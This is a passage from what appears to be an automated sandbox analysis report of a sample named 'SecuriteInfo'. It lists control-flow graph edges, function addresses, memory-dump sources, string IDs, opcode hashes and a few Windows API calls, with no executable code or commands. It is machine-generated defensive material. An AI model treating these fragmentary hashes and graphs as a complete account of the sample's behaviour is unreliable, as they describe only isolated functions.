fa726c-fa7270 113->121 122 fa7232-fa723c call fa5b50 113->122 114->43 114->115 118 fa71fa-fa71fc 115->118 119 fa71c7-fa71d0 115->119 120 fa7156-fa7158 116->120 117->120 118->43 126 fa7202-fa7209 118->126 124 fa71df-fa71f5 119->124 125 fa71d2-fa71d7 119->125 120->43 120->99 121->77 128 fa7276-fa727a 121->128 122->121 132 fa723e-fa7253 122->132 124->43 125->124 128->77 131 fa7280-fa728d 128->131 135 fa728f-fa729a 131->135 136 fa729c 131->136 132->121 141 fa7255-fa726a 132->141 138 fa729e-fa72a0 135->138 136->138 138->43 138->77 141->1 141->121 144->85 145->85
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID: (o]q$(o]q$(o]q$(o]q$(o]q$(o]q$,aq$,aq
              • API String ID: 0-1435242062
              • Opcode ID: a0e96f5c423f2e43273d8fae009f1dac6de67dfd928933104aac5e4b7ba3c02d
              • Instruction ID: dd4f6d94df0bf956fecd95fb2d3401cff468ae07566a44a1e0cb393fffe85116
              • Opcode Fuzzy Hash: a0e96f5c423f2e43273d8fae009f1dac6de67dfd928933104aac5e4b7ba3c02d
              • Instruction Fuzzy Hash: A5127971A046098FCB14DF68D984EAEBBF6FF8A314F158599E805DB2A1D730EC41DB50
              Function 00FA87E9 Relevance: 4.2, Strings: 3, Instructions: 498COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 751 fa87e9-fa8805 752 fa8811-fa881d 751->752 753 fa8807-fa880c 751->753 756 fa881f-fa8821 752->756 757 fa882d-fa8832 752->757 754 fa8ba6-fa8bab 753->754 758 fa8829-fa882b 756->758 757->754 758->757 759 fa8837-fa8843 758->759 761 fa8853-fa8858 759->761 762 fa8845-fa8851 759->762 761->754 762->761 764 fa885d-fa8868 762->764 766 fa886e-fa8879 764->766 767 fa8912-fa891d 764->767 772 fa887b-fa888d 766->772 773 fa888f 766->773 770 fa8923-fa8932 767->770 771 fa89c0-fa89cc 767->771 780 fa8943-fa8952 770->780 781 fa8934-fa893e 770->781 782 fa89ce-fa89da 771->782 783 fa89dc-fa89ee 771->783 774 fa8894-fa8896 772->774 773->774 777 fa8898-fa88a7 774->777 778 fa88b6-fa88bb 774->778 777->778 789 fa88a9-fa88b4 777->789 778->754 791 fa8976-fa897f 780->791 792 fa8954-fa8960 780->792 781->754 782->783 790 fa8a1c-fa8a27 782->790 797 fa8a12-fa8a17 783->797 798 fa89f0-fa89fc 783->798 789->778 795 fa88c0-fa88c9 789->795 801 fa8b09-fa8b14 790->801 802 fa8a2d-fa8a36 790->802 803 fa8981-fa8993 791->803 804 fa8995 791->804 805 fa896c-fa8971 792->805 806 fa8962-fa8967 792->806 811 fa88cb-fa88d0 795->811 812 fa88d5-fa88e4 795->812 797->754 816 fa8a08-fa8a0d 798->816 817 fa89fe-fa8a03 798->817 820 fa8b3e-fa8b4d 801->820 821 fa8b16-fa8b20 801->821 818 fa8a38-fa8a4a 802->818 819 fa8a4c 802->819 808 fa899a-fa899c 803->808 804->808 805->754 806->754 808->771 814 fa899e-fa89aa 808->814 811->754 829 fa8908-fa890d 812->829 830 fa88e6-fa88f2 812->830 831 fa89ac-fa89b1 814->831 832 fa89b6-fa89bb 814->832 816->754 817->754 822 fa8a51-fa8a53 818->822 819->822 834 fa8b4f-fa8b5e 820->834 835 fa8ba1 820->835 837 fa8b22-fa8b2e 821->837 838 fa8b37-fa8b3c 821->838 827 fa8a63 822->827 828 fa8a55-fa8a61 822->828 836 fa8a68-fa8a6a 827->836 828->836 829->754 844 fa88fe-fa8903 830->844 845 fa88f4-fa88f9 830->845 831->754 832->754 834->835 849 fa8b60-fa8b78 834->849 835->754 841 fa8a6c-fa8a71 836->841 842 fa8a76-fa8a89 836->842 837->838 848 fa8b30-fa8b35 837->848 838->754 841->754 850 fa8a8b 842->850 851 fa8ac1-fa8acb 842->851 844->754 845->754 848->754 863 fa8b9a-fa8b9f 849->863 864 fa8b7a-fa8b98 849->864 852 fa8a8e-fa8a9f call fa8258 850->852 857 fa8aea-fa8af6 851->857 858 fa8acd-fa8ad9 call fa8258 851->858 860 fa8aa1-fa8aa4 852->860 861 fa8aa6-fa8aab 852->861 868 fa8af8-fa8afd 857->868 869 fa8aff 857->869 872 fa8adb-fa8ade 858->872 873 fa8ae0-fa8ae5 858->873 860->861 866 fa8ab0-fa8ab3 860->866 861->754 863->754 864->754 870 fa8ab9-fa8abf 866->870 871 fa8bac-fa8bc0 866->871 875 fa8b04 868->875 869->875 870->851 870->852 878 fa8c12 871->878 879 fa8bc2-fa8bd4 871->879 872->857 872->873 873->754 875->754 881 fa8c17-fa8c19 878->881 882 fa8be0-fa8beb 879->882 883 fa8bd6-fa8bdb 879->883 884 fa8c1b-fa8c2a 881->884 885 fa8c4e-fa8c60 881->885 890 fa8c93-fa8c9c 882->890 891 fa8bf1-fa8bfc 882->891 886 fa8d61-fa8d65 883->886 884->885 894 fa8c2c-fa8c42 884->894 892 fa8d5f 885->892 893 fa8c66-fa8c74 885->893 900 fa8c9e-fa8ca9 890->900 901 fa8ce7-fa8cf2 890->901 891->878 897 fa8bfe-fa8c10 891->897 892->886 902 fa8c80-fa8c83 893->902 903 fa8c76-fa8c7b 893->903 894->885 914 fa8c44-fa8c49 894->914 897->881 900->892 910 fa8caf-fa8cc1 900->910 912 fa8d08 901->912 913 fa8cf4-fa8d06 901->913 905 fa8c89-fa8c8c 902->905 906 fa8d66-fa8d96 call fa8378 902->906 903->886 905->893 911 fa8c8e 905->911 931 fa8d98-fa8dac 906->931 932 fa8dad-fa8db1 906->932 910->892 920 fa8cc7-fa8ccb 910->920 911->892 916 fa8d0d-fa8d0f 912->916 913->916 914->886 916->892 917 fa8d11-fa8d20 916->917 926 fa8d48 917->926 927 fa8d22-fa8d2b 917->927 923 fa8ccd-fa8cd2 920->923 924 fa8cd7-fa8cda 920->924 923->886 924->906 928 fa8ce0-fa8ce3 924->928 933 fa8d4d-fa8d4f 926->933 936 fa8d2d-fa8d3f 927->936 937 fa8d41 927->937 928->920 930 fa8ce5 928->930 930->892 933->892 935 fa8d51-fa8d5d 933->935 935->886 939 fa8d46 936->939 937->939 939->933
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID: 4']q$4']q$;]q
              • API String ID: 0-1096896373
              • Opcode ID: c43cd4cc5480596e403ddf1b1521f97a1ba5e1675405b6606e5f950f58be0f7c
              • Instruction ID: 7e4df8f02fd77d71ae3eac6021e3e25d45e42ba950acdb2bed2ed7104a719abf
              • Opcode Fuzzy Hash: c43cd4cc5480596e403ddf1b1521f97a1ba5e1675405b6606e5f950f58be0f7c
              • Instruction Fuzzy Hash: C1F1A1B1B141018FDB199B28C954B397796AFC77A4F1944AAE402CF3B1EEA8CC43E751
              Function 00FA77F0 Relevance: 3.2, Strings: 2, Instructions: 702COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1184 fa77f0-fa7cde 1259 fa8230-fa8265 1184->1259 1260 fa7ce4-fa7cf4 1184->1260 1264 fa8271-fa828f 1259->1264 1265 fa8267-fa826c 1259->1265 1260->1259 1261 fa7cfa-fa7d0a 1260->1261 1261->1259 1263 fa7d10-fa7d20 1261->1263 1263->1259 1266 fa7d26-fa7d36 1263->1266 1278 fa8291-fa829b 1264->1278 1279 fa8306-fa8312 1264->1279 1267 fa8356-fa835b 1265->1267 1266->1259 1268 fa7d3c-fa7d4c 1266->1268 1268->1259 1270 fa7d52-fa7d62 1268->1270 1270->1259 1271 fa7d68-fa7d78 1270->1271 1271->1259 1272 fa7d7e-fa7d8e 1271->1272 1272->1259 1274 fa7d94-fa7da4 1272->1274 1274->1259 1275 fa7daa-fa7dba 1274->1275 1275->1259 1277 fa7dc0-fa822f 1275->1277 1278->1279 1283 fa829d-fa82a9 1278->1283 1284 fa8329-fa8335 1279->1284 1285 fa8314-fa8320 1279->1285 1290 fa82ab-fa82b6 1283->1290 1291 fa82ce-fa82d1 1283->1291 1294 fa834c-fa834e 1284->1294 1295 fa8337-fa8343 1284->1295 1285->1284 1293 fa8322-fa8327 1285->1293 1290->1291 1305 fa82b8-fa82c2 1290->1305 1296 fa82e8-fa82f4 1291->1296 1297 fa82d3-fa82df 1291->1297 1293->1267 1294->1267 1375 fa8350 call fa87e9 1294->1375 1295->1294 1303 fa8345-fa834a 1295->1303 1299 fa835c-fa837e 1296->1299 1300 fa82f6-fa82fd 1296->1300 1297->1296 1307 fa82e1-fa82e6 1297->1307 1310 fa838e 1299->1310 1311 fa8380 1299->1311 1300->1299 1304 fa82ff-fa8304 1300->1304 1303->1267 1304->1267 1305->1291 1315 fa82c4-fa82c9 1305->1315 1307->1267 1314 fa8390-fa8391 1310->1314 1311->1310 1313 fa8387-fa838c 1311->1313 1313->1314 1315->1267 1375->1267
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID: $]q$$]q
              • API String ID: 0-127220927
              • Opcode ID: 584e59df52bfd4aab787a5f00aff8d0502bf05a9215b6afe1552ffa369017c13
              • Instruction ID: 1a8f22ac76c6de6362c16a0d6938ab4840267282abd7efcc61726f7bdd06c1a2
              • Opcode Fuzzy Hash: 584e59df52bfd4aab787a5f00aff8d0502bf05a9215b6afe1552ffa369017c13
              • Instruction Fuzzy Hash: E0525574A00218CFEB159BA4D960B9FBBB6EF94300F1080A9D50A6B3A5CF345E45DFA5
              Function 00FA56A8 Relevance: 2.8, Strings: 2, Instructions: 329COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1628 fa56a8-fa56ca 1629 fa56cc-fa56d0 1628->1629 1630 fa56e0-fa56eb 1628->1630 1631 fa56f8-fa56ff 1629->1631 1632 fa56d2-fa56de 1629->1632 1633 fa5793-fa57bf 1630->1633 1634 fa56f1-fa56f3 1630->1634 1636 fa571f-fa5728 1631->1636 1637 fa5701-fa5708 1631->1637 1632->1630 1632->1631 1641 fa57c6-fa581e 1633->1641 1635 fa578b-fa5790 1634->1635 1733 fa572a call fa56a8 1636->1733 1734 fa572a call fa5698 1636->1734 1637->1636 1638 fa570a-fa5715 1637->1638 1640 fa571b-fa571d 1638->1640 1638->1641 1640->1635 1660 fa582d-fa583f 1641->1660 1661 fa5820-fa5826 1641->1661 1642 fa5730-fa5732 1643 fa573a-fa5742 1642->1643 1644 fa5734-fa5738 1642->1644 1646 fa5751-fa5753 1643->1646 1647 fa5744-fa5749 1643->1647 1644->1643 1649 fa5755-fa5774 call fa6108 1644->1649 1646->1635 1647->1646 1654 fa5789 1649->1654 1655 fa5776-fa577f 1649->1655 1654->1635 1731 fa5781 call faa70d 1655->1731 1732 fa5781 call faa650 1655->1732 1657 fa5787 1657->1635 1663 fa58d3-fa58d5 1660->1663 1664 fa5845-fa5849 1660->1664 1661->1660 1729 fa58d7 call fa5a63 1663->1729 1730 fa58d7 call fa5a70 1663->1730 1665 fa584b-fa5857 1664->1665 1666 fa5859-fa5866 1664->1666 1674 fa5868-fa5872 1665->1674 1666->1674 1667 fa58dd-fa58e3 1668 fa58ef-fa58f6 1667->1668 1669 fa58e5-fa58eb 1667->1669 1672 fa58ed 1669->1672 1673 fa5951-fa59b0 1669->1673 1672->1668 1689 fa59b7-fa59db 1673->1689 1677 fa589f-fa58a3 1674->1677 1678 fa5874-fa5883 1674->1678 1679 fa58af-fa58b3 1677->1679 1680 fa58a5-fa58ab 1677->1680 1686 fa5893-fa589d 1678->1686 1687 fa5885-fa588c 1678->1687 1679->1668 1685 fa58b5-fa58b9 1679->1685 1683 fa58f9-fa594a 1680->1683 1684 fa58ad 1680->1684 1683->1673 1684->1668 1688 fa58bf-fa58d1 1685->1688 1685->1689 1686->1677 1687->1686 1688->1668 1697 fa59dd-fa59df 1689->1697 1698 fa59e1-fa59e3 1689->1698 1701 fa5a59-fa5a5c 1697->1701 1702 fa59f4-fa59f6 1698->1702 1703 fa59e5-fa59e9 1698->1703 1704 fa59f8-fa59fc 1702->1704 1705 fa5a09-fa5a0f 1702->1705 1707 fa59eb-fa59ed 1703->1707 1708 fa59ef-fa59f2 1703->1708 1710 fa59fe-fa5a00 1704->1710 1711 fa5a02-fa5a07 1704->1711 1712 fa5a3a-fa5a3c 1705->1712 1713 fa5a11-fa5a38 1705->1713 1707->1701 1708->1701 1710->1701 1711->1701 1715 fa5a43-fa5a45 1712->1715 1713->1715 1719 fa5a4b-fa5a4d 1715->1719 1720 fa5a47-fa5a49 1715->1720 1721 fa5a4f-fa5a54 1719->1721 1722 fa5a56 1719->1722 1720->1701 1721->1701 1722->1701 1729->1667 1730->1667 1731->1657 1732->1657 1733->1642 1734->1642
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID: Haq$Haq
              • API String ID: 0-4016896955
              • Opcode ID: 9fe8044cb2109685ded7fa75fa185cd3e6f6807832148930f744235acc2672d3
              • Instruction ID: 83a93341c6d4492e3041244cc860065b4354ba10a9fa48052baeaba2504a39e6
              • Opcode Fuzzy Hash: 9fe8044cb2109685ded7fa75fa185cd3e6f6807832148930f744235acc2672d3
              • Instruction Fuzzy Hash: 33B1E2B1B046148FCB159F38D894B7E7BA6AF8A710F148969E446CB391DF38CC05E7A0
              Function 00FA5C08 Relevance: 2.7, Strings: 2, Instructions: 230COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1736 fa5c08-fa5c15 1737 fa5c1d-fa5c1f 1736->1737 1738 fa5c17-fa5c1b 1736->1738 1740 fa5e30-fa5e37 1737->1740 1738->1737 1739 fa5c24-fa5c2f 1738->1739 1741 fa5e38 1739->1741 1742 fa5c35-fa5c3c 1739->1742 1745 fa5e3d-fa5e75 1741->1745 1743 fa5c42-fa5c51 1742->1743 1744 fa5dd1-fa5dd7 1742->1744 1743->1745 1746 fa5c57-fa5c66 1743->1746 1747 fa5dd9-fa5ddb 1744->1747 1748 fa5ddd-fa5de1 1744->1748 1761 fa5e7e-fa5e82 1745->1761 1762 fa5e77-fa5e7c 1745->1762 1754 fa5c7b-fa5c7e 1746->1754 1755 fa5c68-fa5c6b 1746->1755 1747->1740 1749 fa5e2e 1748->1749 1750 fa5de3-fa5de9 1748->1750 1749->1740 1750->1741 1752 fa5deb-fa5dee 1750->1752 1752->1741 1756 fa5df0-fa5e05 1752->1756 1757 fa5c8a-fa5c90 1754->1757 1759 fa5c80-fa5c83 1754->1759 1755->1757 1758 fa5c6d-fa5c70 1755->1758 1771 fa5e29-fa5e2c 1756->1771 1772 fa5e07-fa5e0d 1756->1772 1763 fa5ca8-fa5cc5 1757->1763 1764 fa5c92-fa5c98 1757->1764 1765 fa5d71-fa5d77 1758->1765 1766 fa5c76 1758->1766 1767 fa5cd6-fa5cdc 1759->1767 1768 fa5c85 1759->1768 1773 fa5e88-fa5e8a 1761->1773 1762->1773 1809 fa5cce-fa5cd1 1763->1809 1774 fa5c9a 1764->1774 1775 fa5c9c-fa5ca6 1764->1775 1776 fa5d79-fa5d7f 1765->1776 1777 fa5d8f-fa5d99 1765->1777 1770 fa5d9c-fa5d9e 1766->1770 1778 fa5cde-fa5ce4 1767->1778 1779 fa5cf4-fa5d06 1767->1779 1768->1770 1789 fa5da7-fa5da9 1770->1789 1771->1740 1780 fa5e1f-fa5e22 1772->1780 1781 fa5e0f-fa5e1d 1772->1781 1782 fa5e9f-fa5ea6 1773->1782 1783 fa5e8c-fa5e9e 1773->1783 1774->1763 1775->1763 1785 fa5d83-fa5d8d 1776->1785 1786 fa5d81 1776->1786 1777->1770 1787 fa5ce8-fa5cf2 1778->1787 1788 fa5ce6 1778->1788 1799 fa5d08-fa5d14 1779->1799 1800 fa5d16-fa5d39 1779->1800 1780->1741 1791 fa5e24-fa5e27 1780->1791 1781->1741 1781->1780 1785->1777 1786->1777 1787->1779 1788->1779 1794 fa5dab-fa5daf 1789->1794 1795 fa5dbd-fa5dbf 1789->1795 1791->1771 1791->1772 1794->1795 1803 fa5db1-fa5db5 1794->1803 1804 fa5dc3-fa5dc6 1795->1804 1810 fa5d61-fa5d6f 1799->1810 1800->1741 1812 fa5d3f-fa5d42 1800->1812 1803->1741 1805 fa5dbb 1803->1805 1804->1741 1806 fa5dc8-fa5dcb 1804->1806 1805->1804 1806->1743 1806->1744 1809->1770 1810->1770 1812->1741 1814 fa5d48-fa5d5a 1812->1814 1814->1810
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID: ,aq$,aq
              • API String ID: 0-2990736959
              • Opcode ID: c5d2b218a5460267fc9d7c2eb4a4250ef3a0865cbf75454caa597c77e039908b
              • Instruction ID: 88351de8c26053a8737059469851a425c529655e5f2a926fd1ace63930cb5565
              • Opcode Fuzzy Hash: c5d2b218a5460267fc9d7c2eb4a4250ef3a0865cbf75454caa597c77e039908b
              • Instruction Fuzzy Hash: 8081B1B5A04A05DFCB14CFB8C488A6EB7B2FF8AB24B248169D405DB365D731ED41DB50
              Function 00FA3428 Relevance: 2.6, Strings: 2, Instructions: 112COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1816 fa3428-fa3441 1818 fa3452-fa345a 1816->1818 1819 fa3443-fa3445 1816->1819 1822 fa345c-fa346a 1818->1822 1820 fa344b-fa3450 1819->1820 1821 fa3447-fa3449 1819->1821 1820->1822 1821->1822 1825 fa346c-fa346e 1822->1825 1826 fa3480-fa3488 1822->1826 1827 fa3470-fa3475 1825->1827 1828 fa3477-fa347e 1825->1828 1830 fa348b-fa348e 1826->1830 1827->1830 1828->1830 1831 fa3490-fa349e 1830->1831 1832 fa34a5-fa34a9 1830->1832 1831->1832 1840 fa34a0 1831->1840 1833 fa34ab-fa34b9 1832->1833 1834 fa34c2-fa34c5 1832->1834 1833->1834 1841 fa34bb 1833->1841 1835 fa34cd-fa3502 1834->1835 1836 fa34c7-fa34cb 1834->1836 1845 fa3564-fa3569 1835->1845 1836->1835 1839 fa3504-fa351b 1836->1839 1842 fa351d-fa351f 1839->1842 1843 fa3521-fa352d 1839->1843 1840->1832 1841->1834 1842->1845 1846 fa352f-fa3535 1843->1846 1847 fa3537-fa3541 1843->1847 1848 fa3549 1846->1848 1847->1848 1849 fa3543 1847->1849 1851 fa3551-fa355d 1848->1851 1849->1848 1851->1845
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID: Xaq$Xaq
              • API String ID: 0-1488805882
              • Opcode ID: daeee8bd7212c9d11aa3a9106e12a8d45a547b2b5e1864b25a828af5909118b1
              • Instruction ID: ee6956cad828324ad96b54cc08d87c872e86491c14ca9b5c2f3c7f3f39075377
              • Opcode Fuzzy Hash: daeee8bd7212c9d11aa3a9106e12a8d45a547b2b5e1864b25a828af5909118b1
              • Instruction Fuzzy Hash: 8131F7B2F043258BDF1D8E69599427EA5DABBCA320F184439FC06C3384DF74CE05A661
              Function 00FA0C8F Relevance: 1.7, Strings: 1, Instructions: 401COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID: LR]q
              • API String ID: 0-3081347316
              • Opcode ID: 2bf18f9da8015e017edcd9380e17c5990192e03151c5cfd034f617a08e496ee4
              • Instruction ID: 5076ac7af798c90a51368e66eb7e2f2ed5b08acd22de06ed638c016ec511f28c
              • Opcode Fuzzy Hash: 2bf18f9da8015e017edcd9380e17c5990192e03151c5cfd034f617a08e496ee4
              • Instruction Fuzzy Hash: 5E220974A14219CFCB54EF64ED85A9DBBB1FF88300F1085A9D809AB369DB346D49CF50
              Function 00FA0CA0 Relevance: 1.6, Strings: 1, Instructions: 395COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID: LR]q
              • API String ID: 0-3081347316
              • Opcode ID: bfdc5a2311447b6fa53f0002f8f4464da22b1349325778bbe0b29632be56edae
              • Instruction ID: d2069aeeef02236a4daff6375da9331eb08ef7a3b381464fd91de07922874ead
              • Opcode Fuzzy Hash: bfdc5a2311447b6fa53f0002f8f4464da22b1349325778bbe0b29632be56edae
              • Instruction Fuzzy Hash: 2D22F874914219CFCB54EF64ED89A9DBBB1FF88300F1085A9D809AB369DB346D49CF50
              Function 05647B24 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
              Download Yara Rule
              APIs
              • CallWindowProcW.USER32(?,?,?,?,?), ref: 05648D59
              Memory Dump Source
              • Source File: 00000004.00000002.3272845389.0000000005640000.00000040.00000800.00020000.00000000.sdmp, Offset: 05640000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_5640000_SecuriteInfo.jbxd
              Similarity
              • API ID: CallProcWindow
              • String ID:
              • API String ID: 2714655100-0
              • Opcode ID: 17cf8729502a6b4a978b4873557801bc8f9d299441fbee18f26168265b0582c8
              • Instruction ID: accffc53fe1753633264785fc2ae378e64fa8b2d724ccf9556b9438e13caafa8
              • Opcode Fuzzy Hash: 17cf8729502a6b4a978b4873557801bc8f9d299441fbee18f26168265b0582c8
              • Instruction Fuzzy Hash: AB41E5B4A002099FCB14DF99C488AAAFBF6FF99314F24C459D519AB321D774A941CFA0
              Function 056476BC Relevance: 1.6, APIs: 1, Instructions: 65COMMON
              Download Yara Rule
              APIs
              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,05647E6E,?,?,?,?,?), ref: 05647F2F
              Memory Dump Source
              • Source File: 00000004.00000002.3272845389.0000000005640000.00000040.00000800.00020000.00000000.sdmp, Offset: 05640000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_5640000_SecuriteInfo.jbxd
              Similarity
              • API ID: DuplicateHandle
              • String ID:
              • API String ID: 3793708945-0
              • Opcode ID: 6fa247d9ef5edc386ff66bd4e7ec447437cd3186bf84ff976faa59a8f70be6d6
              • Instruction ID: 727946fdbd63f1da992be825a429312eca088329e9706bc59b40b4e535fc25b5
              • Opcode Fuzzy Hash: 6fa247d9ef5edc386ff66bd4e7ec447437cd3186bf84ff976faa59a8f70be6d6
              • Instruction Fuzzy Hash: AD21E3B59002489FDB10CFAAD584AEEBBF9FB48310F14805AE918A7310D378A951CFA1
              Function 05647EA0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
              Download Yara Rule
              APIs
              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,05647E6E,?,?,?,?,?), ref: 05647F2F
              Memory Dump Source
              • Source File: 00000004.00000002.3272845389.0000000005640000.00000040.00000800.00020000.00000000.sdmp, Offset: 05640000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_5640000_SecuriteInfo.jbxd
              Similarity
              • API ID: DuplicateHandle
              • String ID:
              • API String ID: 3793708945-0
              • Opcode ID: da67d68d055b775288a2dc68dc7bcb08f823ec6af73b43e8d63d86bd4a804fc2
              • Instruction ID: 98570ebbdefe9cbcd8755750e3a5eb639becde6300f5acebf4f6b3b04e17703c
              • Opcode Fuzzy Hash: da67d68d055b775288a2dc68dc7bcb08f823ec6af73b43e8d63d86bd4a804fc2
              • Instruction Fuzzy Hash: 2A21DFB69012489FDB10CFAAD584AEEBFF4FB48310F14841AE959A3310D378A955CFA1
              Function 05642B5C Relevance: 1.5, APIs: 1, Instructions: 47timeCOMMON
              Download Yara Rule
              APIs
              • SetTimer.USER32(?,02976428,?,?), ref: 05648F4D
              Memory Dump Source
              • Source File: 00000004.00000002.3272845389.0000000005640000.00000040.00000800.00020000.00000000.sdmp, Offset: 05640000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_5640000_SecuriteInfo.jbxd
              Similarity
              • API ID: Timer
              • String ID:
              • API String ID: 2870079774-0
              • Opcode ID: 55c1f4b6abf3ddf7b03cf5db350f847ab51a6caeda4a33c1093a28032e0e75c1
              • Instruction ID: 2a10ecc05dd129787d656e0fa9a530c1d2b4b8c5cf9bb6fb30d44fcc7ba926c7
              • Opcode Fuzzy Hash: 55c1f4b6abf3ddf7b03cf5db350f847ab51a6caeda4a33c1093a28032e0e75c1
              • Instruction Fuzzy Hash: 8511F2B58003499FCB10DF9AD484BEEBBF9EB48310F10845AE918A7310C379A944CFA5
              Function 05648EE9 Relevance: 1.5, APIs: 1, Instructions: 46timeCOMMON
              Download Yara Rule
              APIs
              • SetTimer.USER32(?,02976428,?,?), ref: 05648F4D
              Memory Dump Source
              • Source File: 00000004.00000002.3272845389.0000000005640000.00000040.00000800.00020000.00000000.sdmp, Offset: 05640000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_5640000_SecuriteInfo.jbxd
              Similarity
              • API ID: Timer
              • String ID:
              • API String ID: 2870079774-0
              • Opcode ID: a22cad5d1a725e233c302719370807a28e23c921dc1303a3fcb709c58b1d3238
              • Instruction ID: 367b92b818c99938e870d90d8208e34b059283488b6bd9424a41b22b830b7db6
              • Opcode Fuzzy Hash: a22cad5d1a725e233c302719370807a28e23c921dc1303a3fcb709c58b1d3238
              • Instruction Fuzzy Hash: 5A11E3B58002499FDB10DF99D545BDEFBF8EB49310F108459E558A3200C375A544CFA1
              Function 00FAA650 Relevance: 1.4, Strings: 1, Instructions: 122COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID: (o]q
              • API String ID: 0-794736227
              • Opcode ID: d9ec371c22d02d1461e89f18c94919e3f41489b7640e2d5c1685f24fc7432057
              • Instruction ID: e746211f5c0eb31297e2c7c6f097c38b57823d4c690ae6d711aaed8a4789e819
              • Opcode Fuzzy Hash: d9ec371c22d02d1461e89f18c94919e3f41489b7640e2d5c1685f24fc7432057
              • Instruction Fuzzy Hash: A341DB35B042488FDB159B78D854ABE7BF2AFC9310F1448A9E946D7391CE358C16CBA1
              Function 00FA77E0 Relevance: .6, Instructions: 571COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9cf3a2770c3ccbb8dbc82b589105fe9f91a3f244b34780bd3794a3e39e7038ed
              • Instruction ID: 496391d3750279730424f1a7b84b7f666dd925438772b61c09f3527b690d4628
              • Opcode Fuzzy Hash: 9cf3a2770c3ccbb8dbc82b589105fe9f91a3f244b34780bd3794a3e39e7038ed
              • Instruction Fuzzy Hash: 62423274A0021CCFEB159BA4D960B9FBBB6EF94300F1080A9D50A6B3A5CF345E45DFA5
              Function 00FAA818 Relevance: .4, Instructions: 410COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.3266643645.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_fa0000_SecuriteInfo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e272caa67b1a6eae6bc2c3ad66d71aab230bf16b8be9fd4eff3f39e301ab3dc2
              • Instruction ID: 92cc4dfa1f53723362fb6e5cd31854882459cc27902e5a29af2edcbb2cc8c0e4
              • Opcode Fuzzy Hash: e272caa67b1a6eae6bc2c3ad66d71aab230bf16b8be9fd4eff3f39e301ab3dc2
              • Instruction Fuzzy Hash: 98F13DB1E402158FCB04CFACC9849ADBBF6FF89350B1A8059E415AB362C735EC45DB61
              Function 00FA7438 Relevance: .2, Instructions: 201COMMON
